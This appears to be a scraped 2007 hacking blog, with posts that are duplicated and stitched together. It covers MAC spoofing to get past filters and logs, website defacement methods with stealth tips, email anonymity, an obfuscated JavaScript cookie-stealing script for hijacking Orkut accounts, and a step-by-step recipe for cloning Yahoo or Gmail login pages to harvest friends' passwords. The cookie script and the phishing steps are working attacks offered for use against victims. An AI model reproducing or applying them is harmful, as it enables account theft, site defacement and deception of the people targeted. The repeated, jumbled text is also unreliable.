First let me explain a few things about MAC addresses. MAC stands for Media Access Control and in a sense the MAC address is a computer?s true name on a LAN. An Ethernet MAC address is a six byte number, usually expressed as a twelve digit hexadecimal number (Example: 1AB4C234AB1F).
IPs are translated to MAC address by a protocol called ARP (Address Resolution Protocol). Let?s say a computer with and IP of 192.168.1.1 wants to send information to another computer on the LAN that has an IP of 192.168.1.2 . First 192.168.1.1 will send out a broadcast to all stations on the LAN asking who has the IP 192.168.1.2. Then the box that has 192.168.1.2 will respond to 192.168.1.1 with it?s MAC address which is cached in 192.168.1.1?s ARP table for later use. To put this in Socratic Dialog form (with just a touch of Stallone):
Host 1 (192.168.1.1): Yo everyone on the LAN (FF:FF:FF:FF:FF:FF), who has the IP 192.168.1.2? My MAC is DE:AD:BE:EF:CA:FE so you can respond back to me.
Host 2 (192.168.1.2): Hello DE:AD:BE:EF:CA:FE, I have IP 192.168.1.2 and my MAC address is 12:34:56:78:90:12 so you can send your IP packets to me.
You can see the ARP table of a box by dropping out to a command prompt and typing ?arp ?a? in Windows or just ?arp? in Linux. ARP can also work the other way by a host on the LAN sending its MAC address to another machine on the LAN for preemptive caching unless the host is configured to not accept un-requested ARP replies.
A person might want to change the MAC address of a NIC for many reasons:
1. To get past MAC address filtering on a router. Valid MAC addresses can be found by sniffing them and then the deviant user could assume the MAC of a valid host. Having two hosts on the same network can cause some network stability problems, but much of the time it's workable. This is one of the reasons why MIC Address filtering on a wireless router is pointless. An attacker can just sniff the MAC address out of the air while in monitor mode and set his WiFi NIC to use it. Interestingly, a lot of hotels use MAC filtering in their "pay to surf" schemes, so this method can be an instant in for cheap skate road warriors.
2. Sniffing other connections on the network. By assuming another host's MAC as their own they may receive packets not meant for them. However, ARP poisoning is generally a better method than MAC spoofing to accomplish this task.
3. So as to keep their burned in MAC address out of IDS and security logs, thus keeping deviant behavior from being connected to their hardware. For example, two of the main things a DHCP server logs when it leases an IP to a client is the MAC address and host name. If you have a wireless router look around on it's web interface for where it logs this info. Luckily there are tools to randomize this information (MadMACs).
4. To pull off a denial of service attack, for instance assuming the MAC of the gateway to a sub net might cause traffic problems. Also, a lot of WiFi routers will lock up if a client tries to connect with the same MAC as the router's BSSID.
Linux
To change your MAC address in Linux (and most *nix system) is easy as pie. All it takes is two easy to script commands:
ifconfig eth0 down hw ether 00:00:00:00:00:01
ifconfig eth0 up
These two little commands would set your eth0 interface to use the MAC 00:00:00:00:00:01. Just plug in the NIC you want to set and the MAC address you want to use into the commands above and your done. Changing your MAC address is one of those things that is much easier to do in Linux then under Windows.
Mac OS X
For versions of OS X before Tiger (OS X 10.4) you will need this patch:
http://slagheap.net/etherspoof/
Then you use a command like:
sudo ifconfig en0 lladdr 00:00:00:00:00:01
I'm not much of a Macintosh guy, so I pulled most of this info from:
http://www.macgeekery.com/gspot/2006-04/mac_address_spoofing
My understanding is that there are complications with some AirPort cards so you may also want to read:
http://rgov.org/airport-spoof/
Windows 2000/XP/Vista: The Hard Way
In XP you can use the regedit to edit the registry from a GUI or the reg command to edit it from the console, I?ll be using regedit. Information on all your NICs can be found the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\ . Under this key you will find a bunch of sub keys labeled as 0000, 00001, 0002 and so forth. We can assume any MAC address we want by finding the key that controls the NIC we want to change, putting in a string value called ?NetworkAddress? and setting it to the MAC address we want to use formatted as a twelve digit hex number (example: 000000000001). To find out which key is which we can search through them for the value ?DriverDesc? until we find the one that matches the NIC we wish to alter. After you set ?NetworkAddress? to the address you want just restart the NIC by disabling it then enabling it (or in the case of PCMCIA cards, just eject and reinsert). You can confirm the MAC address change by using the ?getmac? or ?ipconfig /all? commands.
Windows 2000/XP/Vista: The Easy Way
Use Mac Makeup ( http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp ), MadMACs (http://www.irongeek.com/i.php?page=security/madmacs-mac-spoofer), Smac ( http://www.klcconsulting.net/smac/ ) or Etherchange (http://ntsecurity.nu/toolbox/etherchange/ ). Mac Makeup is a cool little GUI and Command line tool that's freeware, the creator also offers a Plugin for Bart's PE builder. MadMACs is a tool to randomize your MAC address and host name on every reboot. Smac has a nice GUI and was free but has since gone commercial, there's no reason to bother with it as there are free tools that are just as good. I use MadMACs since I wrote it and it lets me keep my host information randomized.
Have fun with your MAC addresses switching, but be careful not to cause network problems. My favorite MAC address is DEADBEEFCAFE, for other interesting MACs see:
http://www.binrev.com/forums/index.php?showtopic=15942
Enjoy.
After Notes:
After I posted my article Benjamin E. Pratt emailed me some other notes on changing your MAC address on different platforms and in different ways:
BSD
1) Bring down the interface: "ifconfig xl0 down"
2) Enter new MAC address: "ifconfig xl0 link 00:00:00:AA:AA:AA"
3) Bring up the interface: "ifconfig xl0 up"
Linux
1) Bring down the interface: "ifconfig eth0 down"
2) Enter new MAC address: "ifconfig eth0 hw ether 00:00:00:AA:AA:AA"
3) Bring up the interface: "ifconfig eth0 up"
Windows 2000/XP
Method 1:
This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn?t support Clone MAC address, then you have to go to second method.
a) Go to Start->Settings->Control Panel and double click on Network and Dial-up Connections.
b) Right click on the NIC you want to change the MAC address and click on properties.
c) Under "General" tab, click on the "Configure" button
d) Click on "Advanced" tab
e) Under "Property section", you should see an item called "Network Address" or "Locally Administered Address", click on it.
f) On the right side, under "Value", type in the New MAC address you want to assign to your NIC. Usually this value is entered without the "-" between the MAC address numbers.
g) Goto command prompt and type in "ipconfig /all" or "net config rdr" to verify the changes. If the changes are not materialized, then use the second method.
h) If successful, reboot your system.
Method 2:
This should work on all Windows 2000/XP systems
a) Go to Start -> Run, type "regedt32" to start registry editor. Do not use "Regedit".
b) Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}". Double click on it to expand the tree. The subkeys are 4-digit numbers, which represent particular network adapters. You should see it starts with 0000, then 0001, 0002, 0003 and so on.
c) Find the interface you want by searching for the proper "DriverDesc" key.
d) Edit, or add, the string key "NetworkAddress" (has the data type "REG_SZ") to contain the new MAC address.
e) Disable then re-enable the network interface that you changed (or reboot the system).
Method 3:
Use the program Etherchange from http://ntsecurity.nu/toolbox/etherchange/
Windows 9x
Use the same method as Windows 2000/XP except for the registry key location is "HKEY_LOCAL_MACHINE\System\ CurrentControlSet\Services\Class\Net" and you must reboot your system.
Thursday, November 22, 2007
Sunday, November 18, 2007
Making A file of the size you want
How to make a file of the size you want ?
Let us assume you want to make a file of size 10000kb
Convert it to bytes -> 10000*1024 which comes out to be 10240000 bytes
Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left -> so finally it comes out be 009C4000
Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.dat
it'll show file not found error ,ignore it
Type RCX -> Enter -> then last four hexadecimal numbers i.e. 4000 ->Enter
Type RBX -> Enter -> then first four hexadecimal numbers i.e. 009C->Enter
Type W ->Enter
Type Q ->Enter
W stands for write and Q for quit
Now check the file you just made by dir command ->dir filename.dat
Using the same technique you can make files as big as you want
Here is an image to show how exactly everything can be done
Another simpler method by Prash2488
try this command on cmd
fsutil file createnew [path]{e.g.:-F:new foldervirus.txt} [SizeInBytes]then press enter:
Let us assume you want to make a file of size 10000kb
Convert it to bytes -> 10000*1024 which comes out to be 10240000 bytes
Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left -> so finally it comes out be 009C4000
Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.dat
it'll show file not found error ,ignore it
Type RCX -> Enter -> then last four hexadecimal numbers i.e. 4000 ->Enter
Type RBX -> Enter -> then first four hexadecimal numbers i.e. 009C->Enter
Type W ->Enter
Type Q ->Enter
W stands for write and Q for quit
Now check the file you just made by dir command ->dir filename.dat
Using the same technique you can make files as big as you want
Here is an image to show how exactly everything can be done
Another simpler method by Prash2488
try this command on cmd
fsutil file createnew [path]{e.g.:-F:new foldervirus.txt} [SizeInBytes]then press enter:
Defacing Sites
Method 1 - Content replacement.
Using the existing server host, web server etc, replace the pages with defaced ones.
- Prerequisite: own the server
- To undo: delete the defaced pages and replace original ones.
Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc, to make it marginally harder to change back.
Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, hidden
possibly as a trojan in existing system programs - ensure that this starts up before
any legit web server, thus rendering the original web server useless.
Method 4- Better web server software replacement.
Destroy or disable the original web server, and trojan system programs, and/or make
subtle configuration changes, or low-level network stuff, which causes
defaced web pages to be served one way or another, by the machine. Take any other steps
to ensure that it cannot be easily undone.
For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.
Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.
Method 6 - DNS hijacking.
compromise the DNS. The higher level the better. Ideally compromise a top-level DNS and insert
a fake A record in, at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.
Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).
Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced
Method 9 - ISP compromise.
Compromise several major ISPs, either trojanning their install CDs, subvert their routers,or do several of the above.
Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.
A determined attacker would carry out all the compromises necessary for 1,2,4,5 and 6 ahead of time,set up zombies to serve various pages, and set all the triggers on the same time bomb.
All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.
Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.
Be Protected Methods.
Tips : Be Stealthy
Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.
Tips : Be Stealthy
Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep
Tips : Be Stealthy
Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.
Tips : Be Stealthy
Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins
and web designers never use them).
Using the existing server host, web server etc, replace the pages with defaced ones.
- Prerequisite: own the server
- To undo: delete the defaced pages and replace original ones.
Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc, to make it marginally harder to change back.
Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, hidden
possibly as a trojan in existing system programs - ensure that this starts up before
any legit web server, thus rendering the original web server useless.
Method 4- Better web server software replacement.
Destroy or disable the original web server, and trojan system programs, and/or make
subtle configuration changes, or low-level network stuff, which causes
defaced web pages to be served one way or another, by the machine. Take any other steps
to ensure that it cannot be easily undone.
For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.
Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.
Method 6 - DNS hijacking.
compromise the DNS. The higher level the better. Ideally compromise a top-level DNS and insert
a fake A record in, at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.
Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).
Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced
Method 9 - ISP compromise.
Compromise several major ISPs, either trojanning their install CDs, subvert their routers,or do several of the above.
Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.
A determined attacker would carry out all the compromises necessary for 1,2,4,5 and 6 ahead of time,set up zombies to serve various pages, and set all the triggers on the same time bomb.
All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.
Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.
Be Protected Methods.
Tips : Be Stealthy
Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.
Tips : Be Stealthy
Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep
Tips : Be Stealthy
Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.
Tips : Be Stealthy
Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins
and web designers never use them).
Saturday, November 17, 2007
how to hide ur self in email
Full Article
So, you want to use e-mail but you also want to stay anonymous when needed. The easiest way to hide is to use one of the free mail servers. These servers will give you additional e-mail address that has nothing to do with your real one. For eg get a free mail account. There're at least two reasons to get some free e-mail accounts: 1. You don't want to be identified; 2. You don't like SPAM. You can also use them to get some nice looking address and set forwarding option on :)
You already know from previous paragraphs that e-mail can be traced back to the sender's IP. Note that checking your mail using POP/IMAP protocols will also leaves your IP in server logs. The same rule is applied even if you're using web-mail. Most of the servers will add some headers with your IP address and sometimes the account name will be also added. If you don't want this to happen you should use web-mail only via anonymous proxy server or use either SocksCap or HTTPort. If you forward messages from one account to another (for example from "altavista email" or "beer.com" to your real e-mail) you can also encounter some problems with your anonymity. Some examples are listed below:
1. Your own mailer immediately reacts on receiving letters with X-Confirm-Reading-To header. In this case (common enough) reading confirmation message will be composed and sent. And the "From:" field will be filled with your real name and e-mail address ... You can avoid such situation by disabling automatic reply to the confirmation requests. For example in the popular e-mail program "The Bat!" you'll need to select "Account" -> "Properties", then expand "Templates", select "Reading confirmation" and check the "Prompt before the Action" box.
2. The message has Return- Receipt -To: (non-standard) or Generate- Delivery- Report: (RFC-1327) headers that make the target server to compose delivery confirmation and return it to the sender. In this case your real address will be disclosed and you have no option to prevent this.
3. There was a problem delivering the message to your mailbox. In this case you also can't block delivery failure report that will be generated by forwarding server and mailed to the sender.
As you can see from above the web-mail is better than forwarding if you want to stay anonymous.
SPAM is another problem everyone is faced with sooner or later. Even if you know REMOVE trick (sending letters to newsgroups with me@REMOVE.domain address where all words are real except the REMOVE:) your address will become the target for spammers some day. Most of free e-mail servers have the option to block "junk e-mail" automatically or by adding sender to the block-list. If your own e-mail program lacks filtering or sorting rules you can use these features to get rid of incoming SPAM. But remember that automatic blocking is usually based on the following rules: it can block all letters that have no your address in "To:" field; it can block letters sent via well-known open relays (you can check whether some server is registered as open relay or not with ORelay tool); it can block letters with some "signal words" inside; etc. It's not a complete protection from SPAM but you may want to try it. Anyway who hinders you to get another free address ?
So, you want to use e-mail but you also want to stay anonymous when needed. The easiest way to hide is to use one of the free mail servers. These servers will give you additional e-mail address that has nothing to do with your real one. For eg get a free mail account. There're at least two reasons to get some free e-mail accounts: 1. You don't want to be identified; 2. You don't like SPAM. You can also use them to get some nice looking address and set forwarding option on :)
You already know from previous paragraphs that e-mail can be traced back to the sender's IP. Note that checking your mail using POP/IMAP protocols will also leaves your IP in server logs. The same rule is applied even if you're using web-mail. Most of the servers will add some headers with your IP address and sometimes the account name will be also added. If you don't want this to happen you should use web-mail only via anonymous proxy server or use either SocksCap or HTTPort. If you forward messages from one account to another (for example from "altavista email" or "beer.com" to your real e-mail) you can also encounter some problems with your anonymity. Some examples are listed below:
1. Your own mailer immediately reacts on receiving letters with X-Confirm-Reading-To header. In this case (common enough) reading confirmation message will be composed and sent. And the "From:" field will be filled with your real name and e-mail address ... You can avoid such situation by disabling automatic reply to the confirmation requests. For example in the popular e-mail program "The Bat!" you'll need to select "Account" -> "Properties", then expand "Templates", select "Reading confirmation" and check the "Prompt before the Action" box.
2. The message has Return- Receipt -To: (non-standard) or Generate- Delivery- Report: (RFC-1327) headers that make the target server to compose delivery confirmation and return it to the sender. In this case your real address will be disclosed and you have no option to prevent this.
3. There was a problem delivering the message to your mailbox. In this case you also can't block delivery failure report that will be generated by forwarding server and mailed to the sender.
As you can see from above the web-mail is better than forwarding if you want to stay anonymous.
SPAM is another problem everyone is faced with sooner or later. Even if you know REMOVE trick (sending letters to newsgroups with me@REMOVE.domain address where all words are real except the REMOVE:) your address will become the target for spammers some day. Most of free e-mail servers have the option to block "junk e-mail" automatically or by adding sender to the block-list. If your own e-mail program lacks filtering or sorting rules you can use these features to get rid of incoming SPAM. But remember that automatic blocking is usually based on the following rules: it can block all letters that have no your address in "To:" field; it can block letters sent via well-known open relays (you can check whether some server is registered as open relay or not with ORelay tool); it can block letters with some "signal words" inside; etc. It's not a complete protection from SPAM but you may want to try it. Anyway who hinders you to get another free address ?
hack orkut ids
first get firefox and the cookie editor plugin for it...u will need them...
then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..
then heres the script
Code:
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
u see the 62915936 part? thats the one u need to edit to get the cookie to your account..... HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
go to YOUR ALBUM section...go to ANY photo and right click on it,see the properties of your display image...u will see something like 12345678.jpg
there will be a eight digit value.. now put that value in the above javascript.thats it. now your javascript will look like
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
Now give this script to the victim,ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook..
now after getting a cookie...go to your home page and open the cookie editor plugin(TOOLS-->COOKIE EDITOR)...type orkut in the text box and click filter/refresh.look for orkut_state cookie. just double click it and replace the orkut_state part with your victims...
no need to change the _umbz _umbc part... THATS IT!!
ANOTHER SCRIPT: 100%working
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action='scrapbook.aspx?Action.submit';nobody.submit() put ur eight digit number in the place of (53093255)
Posted by prakash_jin at 8:58 PM 2 comments Links to this post
Labels: all posts, hacking tutorials, orkut and yahoo hacking
To Hack Gmail-Yahoo-Hotmail Orkut Account
STEP:1 open he website of ORKUT or HOMAIL or REDIFF MAIL or YAHOOMAIL, its your wish. if you want to HACK yahoo id, then go o www.yahoomail.com
STEP2: Now press "CTRL+U", you will get the source code of yahoo page. NOw press "CTRL+A" copy all the text.
step3: Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
STEP4: Now open the the file yahoofake.html using noepad, here you ll find a code which starts with (form action="xxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
delete the above code and paste the yr id
step6: NOw save the file.
you can test whether its working or not. just open the yahoofake.html file and in the place of user name and password, type some thing and sign in. you will get the passwords in your mail id.. check out..
STEP7: NOW UPLOAD the yahoofake.html page using GOOGLE PAGE Creator or using www.50webs.com
step7: after uploading i give the link to your friends, once they sign in you ll get the passwords of your friends id.
full fake page creating will be posted in 2 days
then make two fake accounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised...the choice is yours though..
then heres the script
Code:
javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
u see the 62915936 part? thats the one u need to edit to get the cookie to your account..... HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
go to YOUR ALBUM section...go to ANY photo and right click on it,see the properties of your display image...u will see something like 12345678.jpg
there will be a eight digit value.. now put that value in the above javascript.thats it. now your javascript will look like
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
Now give this script to the victim,ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook..
now after getting a cookie...go to your home page and open the cookie editor plugin(TOOLS-->COOKIE EDITOR)...type orkut in the text box and click filter/refresh.look for orkut_state cookie. just double click it and replace the orkut_state part with your victims...
no need to change the _umbz _umbc part... THATS IT!!
ANOTHER SCRIPT: 100%working
javascript:nobody=replyForm;nobody.toUserId.value=53093255;
nobody.scrapText.value=document.cookie;nobody.
action='scrapbook.aspx?Action.submit';nobody.submit() put ur eight digit number in the place of (53093255)
Posted by prakash_jin at 8:58 PM 2 comments Links to this post
Labels: all posts, hacking tutorials, orkut and yahoo hacking
To Hack Gmail-Yahoo-Hotmail Orkut Account
STEP:1 open he website of ORKUT or HOMAIL or REDIFF MAIL or YAHOOMAIL, its your wish. if you want to HACK yahoo id, then go o www.yahoomail.com
STEP2: Now press "CTRL+U", you will get the source code of yahoo page. NOw press "CTRL+A" copy all the text.
step3: Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
STEP4: Now open the the file yahoofake.html using noepad, here you ll find a code which starts with (form action="xxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
delete the above code and paste the yr id
step6: NOw save the file.
you can test whether its working or not. just open the yahoofake.html file and in the place of user name and password, type some thing and sign in. you will get the passwords in your mail id.. check out..
STEP7: NOW UPLOAD the yahoofake.html page using GOOGLE PAGE Creator or using www.50webs.com
step7: after uploading i give the link to your friends, once they sign in you ll get the passwords of your friends id.
full fake page creating will be posted in 2 days
Subscribe to:
Comments (Atom)
